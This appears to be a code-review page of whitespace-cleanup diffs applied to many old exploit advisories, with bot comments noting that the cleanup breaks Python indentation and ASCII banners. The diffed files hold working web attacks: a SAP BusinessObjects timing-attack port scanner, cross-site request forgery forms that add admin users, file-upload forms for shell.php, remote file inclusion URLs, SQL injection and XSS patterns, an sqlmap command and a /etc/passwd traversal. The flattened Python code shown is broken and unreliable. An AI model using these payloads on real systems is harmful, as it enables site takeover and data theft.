4. Script saved and gives an image msg with a javascript execution on image click.
5. Therefore, Persistent XSS.

View file

@ -19,8 +19,8 @@ import sys
if len(sys.argv) != 4:
   print "Usage: python sblpta.py http://path.faces targetIP targetPort"
   sys.exit(1)
print "Usage: python sblpta.py http://path.faces targetIP targetPort"
sys.exit(1)
url = sys.argv[1]
targetIP = sys.argv[2]
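Review bot: The replacement `print "Usage: ..."` and `sys.exit(1)` lines under `if len(sys.argv) != 4:` appear with no leading whitespace, which would leave the `if` without a body. The non-breaking-space indentation needs to become regular spaces rather than be removed; compiling the file after the change (for example `python2 -m py_compile`) would catch this.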
@ -33,15 +33,15 @@ gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
try:
   request = urllib2.Request(url, headers=headers)
   page = urllib2.urlopen(request, context=gcontext)
   print "[*] Connected to SAP Bussiness Object %s"  %url
request = urllib2.Request(url, headers=headers)
page = urllib2.urlopen(request, context=gcontext)
print "[*] Connected to SAP Bussiness Object %s" %url
except:
   print "[-] Failed To connect to SAP Bussiness Object %s" %url
   print "[*] SAP Bussiness Object Link example: http://domain:port/BZ/portal/95000047/InfoView/logon.faces"
   sys.exit(2)
print "[-] Failed To connect to SAP Bussiness Object %s" %url
print "[*] SAP Bussiness Object Link example: http://domain:port/BZ/portal/95000047/InfoView/logon.faces"
sys.exit(2)
resheaders = page.info()
@ -50,50 +50,50 @@ content = page.readlines()
for line in content:
   if "com.sun.faces.VIEW" in line:
      sfview = line.split("=")[4].split("\"")[1]
      print "[*] Got java faces dynamic value"
if "com.sun.faces.VIEW" in line:
sfview = line.split("=")[4].split("\"")[1]
print "[*] Got java faces dynamic value"
   else:
      continue
else:
continue
if not sfview:
   print "[-] Failed to java faces dynamic value, are you sure you extracted the java faces form from the link ??"
   sys.exit(3)
print "[-] Failed to java faces dynamic value, are you sure you extracted the java faces form from the link ??"
sys.exit(3)
formdata = {"_id0:logon:CMS":targetHostIP,
         "_id0:logon:USERNAME":"",
         "_id0:logon:PASSWORD":"",
         "com.sun.faces.VIEW":sfview,
         "_id0":"_id0"
         }
"_id0:logon:USERNAME":"",
"_id0:logon:PASSWORD":"",
"com.sun.faces.VIEW":sfview,
"_id0":"_id0"
}
data_encode = urllib.urlencode(formdata)
start =  datetime.now()
print "[*] Testing Timing Attack %s" %start       
start = datetime.now()
print "[*] Testing Timing Attack %s" %start
request = urllib2.Request(url,data_encode)
request.add_header('Cookie', cookie)
response  = urllib2.urlopen(request)
response = urllib2.urlopen(request)
end = datetime.now()
the_page = response.read()
if "FWM" in the_page:
   elapsedTime = end-start
   if elapsedTime.total_seconds() >= 10:
elapsedTime = end-start
if elapsedTime.total_seconds() >= 10:
      print "[*] Port %s is Open, Gotcha !!! " %targetPort
print "[*] Port %s is Open, Gotcha !!! " %targetPort
   else:
else:
      print "[*] Port %s is Closed , we die fast"  %targetPort
print "[*] Port %s is Closed , we die fast" %targetPort
elif "FWC" in the_page:
   print "[-] error login expired"
   sys.exit(10)
print "[-] error login expired"
sys.exit(10)
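Review bot: The block under `if "FWM" in the_page:` needs two indentation levels (the `if elapsedTime.total_seconds() >= 10:` / `else:` pair and their `print` lines), but every replacement line in this hunk is shown flush left, as are the body of the `for line in content:` loop and the continuation lines of `formdata`. Replace each non-breaking space with a regular space so the block structure survives the cleanup.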

View file

@ -7,8 +7,8 @@
# Tested on: BackBox Linux
# CVE : CVE-2021-3018
Check the CMS version :goto www.site.com/cms/ and you will notice that in the login box there is the CMS name and its version 
Check if it's vulnerable, goto ->: site.com/cms/print.php if the print.php exists, then try to find any valid ID which returns page to print  e.g: site.com/cms/print.php?id=1
Check the CMS version :goto www.site.com/cms/ and you will notice that in the login box there is the CMS name and its version
Check if it's vulnerable, goto ->: site.com/cms/print.php if the print.php exists, then try to find any valid ID which returns page to print e.g: site.com/cms/print.php?id=1
Parameter: id (GET based)
Use SQLmap if you've found the valid id...
e.g: sqlmap -u "site.com/cms/print.php?id=1" --dbs

View file

@ -18,7 +18,7 @@
<input type="password" name="newpass2" size="40" maxlength="20" /></td>
<input type="radio" name="isadmin" value="1" onclick="Javascript:hesk_toggleLayerDisplay('options')" checked="checked" /> YES (access to all features and categories)</label><br />
<input type="radio" name="isadmin" value="0" onclick="Javascript:hesk_toggleLayerDisplay('options')" /> NO (you can limit features and categories)</label>
<input type="checkbox" name="categories[]" value="2" checked="checked" /> Support</label><br /><label><input type="checkbox" name="categories[]" value="3" /> Billing</label><br /><label><input type="checkbox" name="categories[]" value="4" /> Advertising</label><br /><label><input type="checkbox" name="categories[]" value="1" /> General</label><br />  
<input type="checkbox" name="categories[]" value="2" checked="checked" /> Support</label><br /><label><input type="checkbox" name="categories[]" value="3" /> Billing</label><br /><label><input type="checkbox" name="categories[]" value="4" /> Advertising</label><br /><label><input type="checkbox" name="categories[]" value="1" /> General</label><br />
<input type="checkbox" name="features[]" value="can_view_tickets" checked="checked" />View tickets<sup>1</sup></label><br />
<input type="checkbox" name="features[]" value="can_edit_tickets" />Edit ticket replies<sup>1</sup></label><br />
<input type="checkbox" name="features[]" value="can_del_notes" />Delete any ticket notes<sup>1, 2</sup></label><br />

View file

@ -73,7 +73,7 @@ $datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td>  </td>";
echo "<td> </td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
@ -86,7 +86,7 @@ $ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>  </td>";
{ echo "<td> </td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++)

View file

@ -11,11 +11,11 @@
#
# if(empty($admin_name))
# {
# $errorMessage=warning." Username is empty!";
# $errorMessage=warning." Username is empty!";
# }
# elseif(empty($admin_password))
# {
# $errorMessage=warning." Password is empty!";
# $errorMessage=warning." Password is empty!";
# }
#
#

View file

@ -18,7 +18,7 @@ Contact Me : Eg[At]Hack[DoT]Cl
<title>WebSiteBaker 2.8.1 DataBase Backup</title>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"><b><font size="5" color="#008000">WebSiteBaker 2.8.1
DataBase </font></b><font size="5" color="#008000"><b>Backup</b></font></p>
<p align="center"><font size="5" color="#FFFFFF"><b>By : Tr0y-x</b></font></p>
@ -26,7 +26,7 @@ Contact Me : Eg[At]Hack[DoT]Cl
<a href="http://WwW.SeC-WaR.CoM<http://www.sec-war.com/>" style="text-decoration: none">WwW[DoT]SeC-WaR[DoT]CoM</a></b></font></p>
<p align="center"><font size="5" color="#FF6666"><b>Eg[At]Hack[Dot]Cl</b></font></p>
<p align="center"> </p>
<p align="center"> </p>
<body bgcolor="#000000">
@ -39,9 +39,9 @@ Contact Me : Eg[At]Hack[DoT]Cl
<input type="submit" name="backup" value="Backup Database" />
</font></p>
</form>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"><b><font color="#FFFFFF">Greetz : Alnjm33 - Predator - xXx -
Shooter  - Jamba - Jago-dz & All Sec-War.Com Members</font></b></p>
Shooter - Jamba - Jago-dz & All Sec-War.Com Members</font></b></p>
<p align="center"><font color="#FFFFFF"><b>Specially To My Best Friend XR57</b></font></p>
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

View file

@ -34,7 +34,7 @@ My home : Sec-war.com
</thead>
<tr vAlign="top">
<td class="optiontitle" colSpan="2">
<p align="center"> </td>
<p align="center"> </td>
</tr>
<tbody id="tbody_bbtitle">
<tr vAlign="top">
@ -50,7 +50,7 @@ My home : Sec-war.com
<tr vAlign="top">
<td class="optiontitle" colSpan="2">
<div>
<p align="center"> </div>
<p align="center"> </div>
</td>
</tr>
<tbody id="tbody_bbtitle">
@ -59,13 +59,13 @@ My home : Sec-war.com
<p align="center">PASS must me*</td>
<td class="alt1" width="52%">
<p align="center">
<input class="bginput" dir="rtl" tabIndex="1" type="password" size="40" name="password" value="123456"><span lang="fr"> 
<input class="bginput" dir="rtl" tabIndex="1" type="password" size="40" name="password" value="123456"><span lang="fr">
</span></td>
</tr>
<tr vAlign="top">
<td class="optiontitle" colSpan="2">
<div>
<p align="center"> </div>
<p align="center"> </div>
</td>
</tr>
<tbody id="tbody_bbtitle">
@ -76,12 +76,12 @@ My home : Sec-war.com
</td>
<td class="alt1" width="52%">
<p align="center">
<input class="bginput" dir="rtl" tabIndex="1" size="40" name="useremail" value="sec-war@demo.net"><span lang="fr"> 
<input class="bginput" dir="rtl" tabIndex="1" size="40" name="useremail" value="sec-war@demo.net"><span lang="fr">
</span></td>
</tr>
<tr vAlign="top">
<td class="optiontitle" colSpan="2">
 </td>
</td>
</tr>
<tbody id="tbody_bbtitle">
<tr vAlign="top">
@ -97,12 +97,12 @@ My home : Sec-war.com
<option>-- --</option>
<option value="MA"> </option>
<option value="EG" selected></option>
</select> <span lang="fr">  </span></td>
</select> <span lang="fr"> </span></td>
</tr>
<tr vAlign="top">
<td class="optiontitle" colSpan="2">
<div>
<p align="center"> </div>
<p align="center"> </div>
</td>
</tr>
<tbody id="tbody_bbtitle">
@ -119,12 +119,12 @@ My home : Sec-war.com
<option value="3"></option>
<option value="2"></option>
<option value="1"></option>
</select> <span lang="fr">  </span></td>
</select> <span lang="fr"> </span></td>
</tr>
<tbody id="tbody_bbtitle">
<tr>
<td class="tfoot" align="middle" colSpan="2">
<input class="button" id="submit" type="submit" value="ok add "> 
<input class="button" id="submit" type="submit" value="ok add ">
</td>
</tr>
</table>

View file

@ -50,7 +50,7 @@ size="2" face="Tahoma">
value="reset" name="B2" style="float: left"></p>
</form>
<p><br>
 </p>
</p>
</center>
</body>

View file

@ -58,7 +58,7 @@ size="2" face="Tahoma">
value="reset" name="B2" style="float: left"></p>
</form>
<p><br>
 </p>
</p>
</center>
</body>

View file

@ -39,7 +39,7 @@
or
</font>
<font face="Tahoma" size="2" color="#000000">http://victim</font><font
size="2" face="Tahoma"></a> <font size="2"> --></font></font></b><font
size="2" face="Tahoma"></a> <font size="2"> --></font></font></b><font
size="2" face="Tahoma">
<input type="text" name="victim" size="20";"></p>
<center>
@ -49,7 +49,7 @@ size="2" face="Tahoma">
value="reset" name="B2" style="float: left"></p>
</form>
<p><br>
 </p>
</p>
</center>
</body>

View file

@ -42,7 +42,7 @@
<tr><td>MySQL login:</td><td><input type="text" name="databaselogin" value="" /></td></tr>
<tr><td>MySQL password:</td><td><input type="text" name="databasepassword" value="" /></td></tr>
<tr><td>MySQL host:</td><td><input type="text" name="databasehost" value="" /></td></tr>
<tr><td> </td><td><input type="submit" name="submit" value="Create Database" /></td></tr>
<tr><td> </td><td><input type="submit" name="submit" value="Create Database" /></td></tr>
</table></form>
</html>

View file

@ -13,8 +13,8 @@
<form name="form1" method="post" action="http://[vuln_site]/kubeblog/adm/users_add.php">
<table width="70%" cellpadding="0" cellspacing="2" border="0">
<tr>
<td width="35%"> </td>
<td width="65%"> </td>
<td width="35%"> </td>
<td width="65%"> </td>
</tr>
<tr>
@ -40,15 +40,15 @@
</tr>
<tr>
<td> </td>
<td> </td>
<td> </td>
<td> </td>
</tr>
<tr>
<td></td>
<td height="30" style="padding-left:6px;">
<input name="Submit" type="submit" class="button" value="Submit">
 
<input name="Reset" type="reset" class="button" value="Reset">
</td>
</tr>

View file

@ -57,7 +57,7 @@ _____________________________________________________________
<input name="ok" type="submit" class="button" id="ok" value="OK">
</p>
<p align="center">(only gif png jpg are allowed) </p>
<p align="center">Files go to:  http://example.pt/uploads/your_file.php.png</p>
<p align="center">Files go to: http://example.pt/uploads/your_file.php.png</p>
</form>
</html>

View file

@ -84,7 +84,7 @@ Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download&
FILE NAME:<br>
<input type="text" name="filename">  (ex. shell.php)<br>FILE CONTENTS:<br>
<input type="text" name="filename"> (ex. shell.php)<br>FILE CONTENTS:<br>
<textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea>

View file

@ -90,7 +90,7 @@ $datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td>  </td>";
echo "<td> </td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
@ -103,7 +103,7 @@ $ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>  </td>";
{ echo "<td> </td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++)

View file

@ -1,23 +1,23 @@
        =======================================
          eLMS Pro SQLi and XSS Vulnerability
        =======================================
=======================================
eLMS Pro SQLi and XSS Vulnerability
=======================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1               ##########################################             1
0               I'm Sid3^effects member from Inj3ct0r Team             1
1               ##########################################             0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################## 1
0 I'm Sid3^effects member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Name : eLMS Pro SQLi and XSS Vulnerability
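Review bot: in the banner between the two '-=-=' rule lines, collapsing each run of spaces to a single space destroys the ASCII-art logo and the 0/1 right-hand border, which no longer lines up (compare the old '0     _                   __ ...' row with the new '0 _ __ __ __ 1'). The header is preformatted text, so replace unusual whitespace characters one-for-one with ordinary spaces instead of collapsing runs, or exclude banner blocks from the normalization.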
@ -49,14 +49,14 @@ smart calendar. IM communication is available for all 3 user levels.
Xploit: SQLi Vulnerability
DEMO  URL :http://[site]/subscribe.php?course_id=[sqli]
DEMO URL :http://[site]/subscribe.php?course_id=[sqli]
###############################################################################################################
Xploit: XSS Vulnerability
  Attack Pattern: '"-->
Attack Pattern: '"-->
  http://[site]/subscribe.php?course_id=[XSS]
http://[site]/subscribe.php?course_id=[XSS]
###############################################################################################################

View file

@ -1,23 +1,23 @@
        =======================================
          PGAUTOPro SQLi and XSS Vulnerability
        =======================================
=======================================
PGAUTOPro SQLi and XSS Vulnerability
=======================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1               ##########################################             1
0               I'm Sid3^effects member from Inj3ct0r Team             1
1               ##########################################             0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################## 1
0 I'm Sid3^effects member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Name : PGAUTOPro SQLi and XSS Vulnerability
@ -46,7 +46,7 @@ advertisirs, placing your own AdSense contextual ads will let you derive profit
Xploit: SQLi Vulnerability
DEMO  
DEMO
URL:http://[site]/vehicle/buy_do_search/?order_direction=DESC&&status=1&form_gid=vehicle_user_quick_search_new&back_module=vehicl
@ -55,9 +55,9 @@ e%2Fbuy_do_search&page=[SQLi]
###############################################################################################################
Xploit: XSS Vulnerability
  Attack Pattern: '"-->
Attack Pattern: '"-->
  http://[site]/vehicle/buy_do_search/?order_direction=[XSS]
http://[site]/vehicle/buy_do_search/?order_direction=[XSS]
###############################################################################################################

View file

@ -1,12 +1,12 @@
Name : PHPAuctionSystem Upload Vulnerability
Date : june, 16 2010
Vendor url :http://www.phpauctions.info/
Critical Level     : HIGH
Critical Level : HIGH
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
greetz to :All ICW members and my friends :) luv y0 guyz
#######################################################################################################
 
PHPAuctionSystem had various vulnerablities which was found
@ -15,17 +15,17 @@ PHPAuctionSystem had various vulnerablities which was found
Xploit:Upload Vulnerability
 Step 1: register as a user :)
 
 Step 2: goto "sell an item" option
Step 1: register as a user :)
 DEMO URL :http://[site]/select_category.php?
Step 2: goto "sell an item" option
 Step 3: post ur evil-code in the item description
DEMO URL :http://[site]/select_category.php?
 Step 4:check your item and ur evil script is executed and upload your shell and enjoy :P
Step 3: post ur evil-code in the item description
 demo url :http://[site]/sell.php :)
Step 4:check your item and ur evil script is executed and upload your shell and enjoy :P
demo url :http://[site]/sell.php :)
###############################################################################################################

View file

@ -1,6 +1,6 @@
Date : june, 18 2010
Vendor url :http://www.axxis.gr/
Critical Level     : HIGH
Critical Level : HIGH
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,gunslinger_
greetz to :All ICW members and my friends :) luv y0 guyz
@ -32,8 +32,8 @@ Xploit:Persistent xss Vulnerability
Step 1 : As always register as a user :P
Step 2 : Goto your profile..you will able to see "What's on your mind PRO module:"
 
         INsert your evil XSS script or xss shell ;) and voila
INsert your evil XSS script or xss shell ;) and voila
DEMO URL :http://[site]/index.php?option=com_content&view=frontpage&setLang=en-GB&Itemid=1

View file

@ -39,7 +39,7 @@ HackTalk Security
</tr>
<tr style="display:none;">
<td> </td>
<td> </td>
<td style="font-size: 10px;">
Please note: You should only enter values in the above fields if you wish to change this users password
</td>
@ -80,7 +80,7 @@ Please note: You should only enter values in the above fields if you wish to cha
</tr>
<tr>
<td> </td>
<td> </td>
<td>
<input type="radio" name="active[]" id="active" value="1" checked="checked" />
<label for="active">Active</label>
@ -90,7 +90,7 @@ Please note: You should only enter values in the above fields if you wish to cha
</tr>
<tr>
<td> </td>
<td> </td>
<td>
<input type="submit" name="submit" value="Add" />
<input type="reset" name="reset" value="Reset" />

View file

@ -87,7 +87,7 @@ return(true);
<INPUT NAME=userfile SIZE=30 TYPE=file MaxFileSize="1000000">
<input type="hidden" name="MAX_FILE_SIZE" value="1000000">
</TD></TR>
<TR><TD> </TD></TR>
<TR><TD> </TD></TR>
<TR><TD><input type="submit" value="Upload" name="uploadfile"></TD></TR>
<TR><TD>NOTE: Please be patient, you will not receive any notification until the
file is completely transferred.<BR><BR></TD></TR>

View file

@ -16,8 +16,8 @@ admin panel for managing your forum. Also includes support for
categories, plugins, languages, and themes."
# Credit: Vulnerability founded by Canberk BOLAT at ADEO Security Labs
       - Mail: security[AT]adeo.com.tr
       - Web: http://security.adeo.com.tr
- Mail: security[AT]adeo.com.tr
- Web: http://security.adeo.com.tr
# Vulnerability:
If administrator of the board browse PoC attacker can gain privilege

View file

@ -35,7 +35,7 @@ EZ-Oscommerce 3.1 Remote File Upload
FILE NAME:<br>
<input type="text" name="filename">  (ex. shell.php)<br>FILE CONTENTS:<br>
<input type="text" name="filename"> (ex. shell.php)<br>FILE CONTENTS:<br>
<textarea name="file_contents" wrap="soft" cols="70" rows="10">&lt;/textarea&gt;

View file

@ -2,33 +2,33 @@
phpBazar admin information discloser Vulnerability
=====================================
Author                 :: Net_Spy
Group                  :: Aras cyber Army
Email                  :: tvc82_2002@yahoo.com
Discover               :: 1 july 2010
Critical Lvl           :: M
Published              :: 22 july 2010
Vendor                 :: http://www.smartisoft.com/
Author :: Net_Spy
Group :: Aras cyber Army
Email :: tvc82_2002@yahoo.com
Discover :: 1 july 2010
Critical Lvl :: M
Published :: 22 july 2010
Vendor :: http://www.smartisoft.com/
---------------------------------------------------------------------------
~~~~~~~~~
Dork                   :: intitle: phpBazar-AdminPanel
Dork :: intitle: phpBazar-AdminPanel
~~~~~~~~~~~~~~~~~~
demo                   :: http://www.target.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0
                         
demo :: http://www.target.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0
~~~~~~~~~~~~~~~~~~~~~~~~~
Example Just For Edu   :: http://www.site.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0
             
              
Example Just For Edu :: http://www.site.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+++++++++++++++++++++++++++++++++++++++
[!] greetiz to ::
    DrgPxX,D3stan,hackfaz,hamed.err000r,Net_Spy,jawadn
    All aras cyber amry members
   
DrgPxX,D3stan,hackfaz,hamed.err000r,Net_Spy,jawadn
All aras cyber amry members
+++++++++++++++++++++++++++++++++++++++

View file

@ -33,8 +33,8 @@ Detail :
$title = $lang['saved_search'];
}
$display .= '<a href="index.php?action=searchresults&' . $misc->make_db_unsafe
($recordSet->fields['usersavedsearches_query_string']) . '">' . $title . '</a> 
   <div class="note"><a href="index.php?action=delete_search&
($recordSet->fields['usersavedsearches_query_string']) . '">' . $title . '</a>
<div class="note"><a href="index.php?action=delete_search&
searchID=' . $misc->make_db_unsafe($recordSet->fields['usersavedsearches_id']) . '"
onclick="return confirmDelete()">' . $lang['delete_search'] . '</a></div><br /><br />';

View file

@ -1,12 +1,12 @@
# Exploit Title: [MailForm Remote File Include ]
# Date: [14-8-2010]
# Author: LoSt.HaCkEr  /  aDaM_TRoJaN
# Author: LoSt.HaCkEr / aDaM_TRoJaN
# Software Link: [http://scripts.bdr130.net/files/any/MailForm.zip]
# Version: [v 1.2 ]
# Tested on: [Windows XP]
# CVE : [هكر المسيب]
#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/  aDaM_TRoJaN@yahoo.com
 +++++++++++++++++++++++++++++++++++++++++++++++++++++
#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/ aDaM_TRoJaN@yahoo.com
+++++++++++++++++++++++++++++++++++++++++++++++++++++
Exploit: http://target/MailForm/HTML/index.php?theme=[EV!L]
 +++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++
A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers

View file

@ -1,12 +1,12 @@
# Exploit Title: [4images1.7.8 Remote File Include ]
# Date: [23-8-2010]
# Author: LoSt.HaCkEr  /  aDaM_TRoJaN
# Author: LoSt.HaCkEr / aDaM_TRoJaN
# Software Link: [http://www.4homepages.de/4images/download.php]
# Version: [v 1.7.8 ]
# Tested on: [Windows XP]
# CVE :
#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/  aDaM_TRoJaN@yahoo.com
 +++++++++++++++++++++++++++++++++++++++++++++++++++++
#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/ aDaM_TRoJaN@yahoo.com
+++++++++++++++++++++++++++++++++++++++++++++++++++++
Exploit: http://target/4images1.7.8/4images/global.php?db_servertype=[SHeLL]
 +++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++
A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers

View file

@ -1,12 +1,12 @@
# Exploit Title: [oscommerce-3.0a5 Remote File Inclusion ]
# Date: [26-8-2010]
# Author: LoSt.HaCkEr  /  aDaM_TRoJaN
# Author: LoSt.HaCkEr / aDaM_TRoJaN
# Software Link: [http://www.oscommerce.com/solutions/downloads]
# Version: [v 3.0 ]
# Tested on: [Windows XP]
# CVE :
#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/  aDaM_TRoJaN@yahoo.com
 +++++++++++++++++++++++++++++++++++++++++++++++++++++
#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/ aDaM_TRoJaN@yahoo.com
+++++++++++++++++++++++++++++++++++++++++++++++++++++
Exploit: http://target/oscommerce-3.0a5/oscommerce-3.0a5/oscommerce/includes/classes/actions.php?module=[SHeLL]
 +++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++
A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers

View file

@ -8,24 +8,24 @@
<body bgcolor="#000000" style="background-attachment: fixed" background="http://www.sa-virus.com/reno/bg.gif">
<p
align="left"><font size="5"
color="#FFFFFF"><b>                                
color="#FFFFFF"><b>
               
</b></font><b><font color="#FFFFFF" size="5">Pc4Uploader - [XSRF ] Add Admin
Exploit<br>
                                                                  
  
Author : RENO<br>
                                                         
    TeaM : SauDi ViRuS TeaM<br>
                                                           
  
TeaM : SauDi ViRuS TeaM<br>
Site : <a href="http://WwW.Sa-ViRuS.CoM">WwW.Sa-ViRuS.CoM</a><br>
                                                       
    
Email : R7e@HoTMaiL.coM</font></b></p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<svt>
<center>

View file

@ -1,6 +1,6 @@
# Exploit Title: [DiY-CMS 1.0 Remote File Inclusion ]
# Date: [28-8-2010]
# Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
# Author: LoSt.HaCkEr ~ aDaM_TRoJaN
# Software Link: [http://webscripts.softpedia.com/scriptDownload/DiY-CMS-Download-63258.html]
# Version: [v 1.0 ]
# Tested on: [Windows XP]

View file

@ -1,6 +1,6 @@
# Exploit Title: [iJoomla.Magazine.v.3.0.1 Remote File Inclusion ]
# Date: [5-9-2010]
# Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
# Author: LoSt.HaCkEr ~ aDaM_TRoJaN
# Software Link: [http://www.ijoomla.com/ijoomla-magazine/ijoomla-magazine/index/]
# Version: [v 3.0.1 ]
# Tested on: [Windows XP]
@ -9,4 +9,4 @@
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit: http://iJoomla.Magazine.v.3.0.1-_TKT_/com_magazine_3_0_1/magazine.functions.php?config=[SHeLL]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[~]
Greetings:  No
Greetings: No

View file

@ -2,17 +2,17 @@
Date : Sep 6, 2010
Author: Saxtor {Location: South America (Guyana)}
Email: admin@saxtorinc.com
Category::  Web Applications 
Category:: Web Applications
Verison: 5.5
suffers a directory traversal
vulnerability.  This vulnerability could allow
vulnerability. This vulnerability could allow
attackers to read arbitrary files =>
------------------------------
http://localhost/Javabridge/source.php?source=/etc/passwd
------------------------------
 */
*/
<?php
/**

View file

@ -1,6 +1,6 @@
[x] Exploit Title: [FCMS_2.2.3 Remote File Inclusion ]
[x] Date: 10-9-2010]
[x] Author: LoSt.HaCkEr  ~  aDaM_TRoJaN
[x] Author: LoSt.HaCkEr ~ aDaM_TRoJaN
[x] Software Link: [http://www.familycms.com/getstarted.php]
[x] Version: [v 2.2.3 ]
[x]Tested on: [Windows XP]
@ -11,4 +11,4 @@
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
